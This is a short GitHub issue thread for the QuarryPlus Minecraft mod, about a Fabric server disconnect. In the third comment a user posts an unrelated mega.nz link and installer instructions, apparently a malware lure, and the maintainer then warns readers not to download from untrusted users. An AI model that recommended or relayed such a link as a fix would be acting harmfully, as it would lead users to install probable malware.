### ISSUE TITLE
fabric server

### ISSUE THREAD

**Issue by retiredcowboy64** [Kotori316/QuarryPlus#556]
1.21.1 server disconnet due to null quarryplus:quarrypickaxe  on apex server

**Comment by Kotori316** [comment]
I didn't find any problem of Fabric Server. What kind of issue?

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Kotori316** [comment]
DO NOT access or download links from untrusted users, please.
